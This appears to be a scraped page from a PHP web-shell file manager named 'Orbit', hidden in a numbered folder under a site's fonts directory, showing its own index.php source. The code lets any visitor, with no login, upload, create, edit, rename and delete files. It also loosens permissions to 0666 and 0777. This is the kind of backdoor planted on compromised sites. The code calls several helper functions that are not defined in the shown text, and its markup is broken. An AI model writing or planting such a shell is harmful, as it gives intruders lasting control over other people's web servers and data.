Explorer

home / zoteqbgb / public_html / fonts / 198749

Location: /home/zoteqbgb/public_html/fonts/198749
Root path: /home/zoteqbgb/public_html/config/676626

Editing: index.php

<?php
session_start();

$_SESSION['ptmap'] = $_SESSION['ptmap'] ?? [];
function pt_make(string $abs): string {
    $t = bin2hex(random_bytes(8));
    $_SESSION['ptmap'][$t] = $abs;
    return $t;
}
function pt_read(string $t, string $fallback): string {
    return $_SESSION['ptmap'][$t] ?? $fallback;
}

function h($s){return strtr((string)$s,["&"=>"&amp;","<"=>"&lt;",">"=>"&gt;","\""=>"&quot;","'"=>"&#039;"]);}

function jmp(string $to, array $note = []): void {
    $qs = $note + ['pt' => pt_make($to)];
    header('Location: ?' . http_build_query($qs));
    exit;
}

function blob_put(string $file, string $data): bool {
    $dir = dirname($file);
    if (!is_dir($dir) or !is_writable($dir)) return false;
    $h = @fopen($file, 'wb');
    if (!$h) return false;
    @flock($h, LOCK_EX);
    $ok = @fwrite($h, $data);
    @flock($h, LOCK_UN);
    @fclose($h);
    return $ok !== false;
}

function perms_octal($p): string { return substr(sprintf('%o', $p), -4); }
function size_h($b): string { return is_numeric($b) ? number_format((float)$b) . ' bytes' : '-'; }

function link_abs(string $abs, string $label): string {
    return "<a class='link' href='?pt=" . h(pt_make($abs)) . "'>" . h($label) . "</a>";
}

$flash = [
    '1' => 'File created.',
    '2' => 'Saved.',
    '3' => 'File removed.',
    '4' => 'Folder created.',
    '5' => 'Folder removed.',
    '6' => 'Renamed.',
    '7' => 'Upload complete.',
    '9' => 'Missing or invalid item.',
    'x' => 'Write failed. Check permissions.',
];

$p   = $_GET['p']  ?? '';
$do  = $_GET['do'] ?? '';
$fn  = $_GET['f']  ?? '';
$dn  = $_GET['d']  ?? '';
$pt  = $_GET['pt'] ?? null;
$ROOT_ANCHOR = rtrim(__DIR__, DIRECTORY_SEPARATOR);
if ($pt !== null) {
    $raw = pt_read($pt, $ROOT_ANCHOR);
    $cwd = path_canon($raw, $ROOT_ANCHOR);
} else {
    $cwd = path_canon($p, $ROOT_ANCHOR);
}

$mk  = $_GET['k'] ?? '';
$mt  = 'ok';
$msg = null;
if ($mk !== '' and array_key_exists($mk, $flash)) {
    $msg = $flash[$mk];
    if (($_GET['t'] ?? '') === 'err') $mt = 'err';
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (isset($_FILES['up'])) {
        $f = $_FILES['up'];
        $dest = rtrim($cwd, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . basename($f['name']);
        if ($f['error'] !== UPLOAD_ERR_OK or !is_uploaded_file($f['tmp_name'])) {
            jmp($cwd, ['k' => '9', 't' => 'err']);
        } elseif (aba_upload($f['tmp_name'], $dest)) {
            jmp($cwd, ['k' => '7']);
        } else {
            jmp($cwd, ['k' => 'x', 't' => 'err']);
        }
    }
    if (isset($_POST['mkf'])) {
        $name = basename(trim((string)($_POST['name'] ?? '')));
        $content = (string)($_POST['payload'] ?? '');
        if ($name === '') jmp($cwd, ['k' => '9', 't' => 'err']);
        $target = $cwd . DIRECTORY_SEPARATOR . $name;
        if (file_exists($target)) jmp($cwd, ['k' => '9', 't' => 'err']);
        if (blob_put($target, $content)) jmp($cwd, ['k' => '1']);
        jmp($cwd, ['k' => 'x', 't' => 'err']);
    }
    if (isset($_POST['mkd'])) {
        $name = basename(trim((string)($_POST['name'] ?? '')));
        if ($name === '') jmp($cwd, ['k' => '9', 't' => 'err']);
        $target = $cwd . DIRECTORY_SEPARATOR . $name;
        if (file_exists($target)) jmp($cwd, ['k' => '9', 't' => 'err']);
        if (@mkdir($target, 0777, true)) jmp($cwd, ['k' => '4']);
        jmp($cwd, ['k' => 'x', 't' => 'err']);
    }
    if (isset($_POST['save']) and $fn !== '') {
        $target = rtrim($cwd, "\\/") . DIRECTORY_SEPARATOR . $fn;
        $content = (string)($_POST['payload'] ?? '');
        if (!is_file($target)) jmp($cwd, ['k' => '9', 't' => 'err']);
        if (!is_writable($target)) @chmod($target, 0666);
        if (!is_writable($target)) {
            jmp($cwd, ['k' => 'x', 't' => 'err', 'do' => 'edit', 'f' => $fn]);
        }
        if (blob_put($target, $content)) {
            jmp($cwd, ['k' => '2', 'do' => 'edit', 'f' => $fn]);
        }
        jmp($cwd, ['k' => 'x', 't' => 'err', 'do' => 'edit', 'f' => $fn]);
    }
    if (isset($_POST['mv'])) {
        $new = basename(trim((string)($_POST['to'] ?? '')));
        $cur = basename(trim((string)($_POST['from'] ?? '')));
        if ($new === '' or $cur === '') jmp($cwd, ['k' => '9', 't' => 'err']);
        $oldPath = $cwd . DIRECTORY_SEPARATOR . $cur;
        $newPath = $cwd . DIRECTORY_SEPARATOR . $new;
        if (!file_exists($oldPath) or file_exists($newPath)) jmp($cwd, ['k' => '9', 't' => 'err']);
        if (@rename($oldPath, $newPath)) jmp($cwd, ['k' => '6']);
        jmp($cwd, ['k' => 'x', 't' => 'err']);
    }
    if (isset($_POST['rmf'])) {
        $file = basename(trim((string)($_POST['n'] ?? '')));
        if ($file !== '') {
            $target = $cwd . DIRECTORY_SEPARATOR . $file;
            if (is_file($target) and @unlink($target)) jmp($cwd, ['k' => '3']);
        }
        jmp($cwd, ['k' => 'x', 't' => 'err']);
    }
    if (isset($_POST['rmd'])) {
        $dir = basename(trim((string)($_POST['n'] ?? '')));
        if ($dir !== '') {
            $target = $cwd . DIRECTORY_SEPARATOR . $dir;
            if (is_dir($target) and nuke_tree($target)) jmp($cwd, ['k' => '5']);
        }
        jmp($cwd, ['k' => 'x', 't' => 'err']);
    }
}
?>
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<title>Orbit</title>
<style>
*{box-sizing:border-box}html,body{margin:0;padding:0}body{background:#fdfdfd;color:#0f1720;font:13px/1.55 ui-sans-serif,system-ui,Segoe UI,Roboto,Ubuntu,Helvetica,Arial}.c0{max-width:1080px;margin:20px auto;padding:0 12px}.c1{display:flex;justify-content:space-between;align-items:center;background:#fff;border:1px solid #e9e9ee;border-radius:18px;padding:14px 16px;box-shadow:0 8px 24px rgba(0,0,0,.05)}.t0{font-weight:800;letter-spacing:.3px}.crumb{font-size:12px;color:#667085}.pill{display:inline-block;background:#f6f7fb;border:1px solid #ececf2;border-radius:999px;padding:.2rem .55rem;margin-left:.35rem}.msg{margin:14px 0;padding:10px 12px;border-radius:12px;border:1px solid #ececf2}.ok{background:#ecfdf5;border-color:#a7f3d0}.err{background:#fff1f2;border-color:#fecdd3}.card{background:#fff;border:1px solid #ececf2;border-radius:16px;padding:14px;box-shadow:0 8px 24px rgba(0,0,0,.05);margin-top:14px}.btn{appearance:none;background:#0b63e5;color:#fff;border:0;border-radius:10px;padding:8px 12px;cursor:pointer}.btn:hover{filter:brightness(1.06)}.in,textarea{width:100%;border:1px solid #e2e4ea;border-radius:10px;padding:10px;background:#fff;color:#0f1720}.tbl{width:100%;border-collapse:collapse}.tbl th,.tbl td{border-bottom:1px solid #f0f0f3;padding:8px 6px;text-align:left}.l0{height:1px;background:#efeff3;margin:14px 0}.grid{display:grid;grid-template-columns:repeat(auto-fit,minmax(260px,1fr));gap:12px}
</style>
</head>
<body>
<div class="c0">
  <header class="c1">
    </div>
  </header>

<?php if ($msg): ?>
    <div class="msg <?php echo h($mt) ?>"><?php echo h($msg) ?></div>
  <?php endif; ?>

<div class="grid">
    <form method="post" enctype="multipart/form-data" class="card">
      <div class="t0" style="font-size:16px">ingest</div>
      <input class="in" type="file" name="up" />
      <div style="margin-top:8px"><button class="btn" type="submit">send</button></div>
    </form>
    <form method="post" class="card">
      <div class="t0" style="font-size:16px">fresh item</div>
      <input class="in" name="name" placeholder="file.ext" />
      <textarea name="payload" rows="6" placeholder="content (opt)"></textarea>
      <div style="margin-top:8px"><button class="btn" type="submit" name="mkf">create</button></div>
    </form>
    <form method="post" class="card">
      <div class="t0" style="font-size:16px">fresh dir</div>
      <input class="in" name="name" placeholder="folder" />
      <div style="margin-top:8px"><button class="btn" type="submit" name="mkd">create</button></div>
    </form>
  </div>

<?php if ($do === 'edit' and $fn !== ''): ?>
    <?php $target = rtrim($cwd,"\/") . DIRECTORY_SEPARATOR . $fn; $content = blob_get($target); ?>
    <?php if ($content === false): ?>
      <div class="msg err">cannot read</div>
    <?php else: ?>
      <form method="post" class="card">
        <div class="t0" style="font-size:16px">revise <span class="pill"><?php echo h($fn) ?></span></div>
        <textarea name="payload" rows="18"><?php echo h($content) ?></textarea>
        <div style="margin-top:10px"><button class="btn" type="submit" name="save">commit</button></div>
      </form>
    <?php endif; ?>
  <?php endif; ?>

<div class="card" style="margin-top:14px">
    <div class="t0" style="font-size:16px;margin-bottom:8px">items</div>
    <table class="tbl">
      <tr><th>name</th><th>size</th><th>perm</th><th>modified</th><th>actions</th></tr>
      <?php
      $list = @scandir($cwd);
      if ($list === false) {
          echo "<tr><td colspan='5'>no access</td></tr>";
      } else {
          foreach ($list as $e) {
              if ($e === '.' or $e === '..') continue;
              $full = $cwd . DIRECTORY_SEPARATOR . $e;
              $isdir = is_dir($full);
              $perm = @fileperms($full);
              $oct  = $perm !== false ? perms_octal($perm) : '----';
              $sz   = $isdir ? '-' : size_h(@filesize($full));
              $ts   = @date('Y-m-d H:i', @filemtime($full));
              echo "<tr>";
              echo "<td>";
              if ($isdir) {
                  echo link_abs($full, $e);
              } else {
                  echo h($e);
              }
              echo "</td>";
              echo "<td>{$sz}</td><td>{$oct}</td><td>{$ts}</td>";
              echo "<td>";
              if ($isdir) {
                  echo "<form method='post' style='display:inline' onsubmit=\"return confirm('remove contents?')\">";
                  echo "<input type='hidden' name='rmd' value='1'>";
                  echo "<input type='hidden' name='n' value='" . h($e) . "'>";
                  echo "<button class='btn' type='submit'>delete</button></form> ";
                  echo "<form method='post' style='display:inline;margin-left:6px'>";
                  echo "<input type='hidden' name='mv' value='1'>";
                  echo "<input type='hidden' name='from' value='" . h($e) . "'>";
                  echo "<input class='in' style='width:160px' name='to' placeholder='rename to'>";
                  echo " <button class='btn' type='submit'>rename</button></form>";
              } else {
                  echo "<a class='link' style='margin-right:8px' href='?pt=" . h(pt_make($cwd)) . "&do=edit&f=" . urlencode($e) . "'>open</a>";
                  echo "<form method='post' style='display:inline' onsubmit=\"return confirm('delete file?')\">";
                  echo "<input type='hidden' name='rmf' value='1'>";
                  echo "<input type='hidden' name='n' value='" . h($e) . "'>";
                  echo "<button class='btn' type='submit'>delete</button></form> ";
                  echo "<form method='post' style='display:inline;margin-left:6px'>";
                  echo "<input type='hidden' name='mv' value='1'>";
                  echo "<input type='hidden' name='from' value='" . h($e) . "'>";
                  echo "<input class='in' style='width:160px' name='to' placeholder='rename to'>";
                  echo " <button class='btn' type='submit'>rename</button></form>";
              }
              echo "</td></tr>";
          }
      }
      ?>
    </table>
  </div>
</div>
</body>
</html>

Directory Contents

Name	Size	Perms	Modified	Actions
.htaccess	123 bytes	0644	2025-11-15 10:39	âï¸
index.php	15,473 bytes	0644	2025-05-05 10:33	âï¸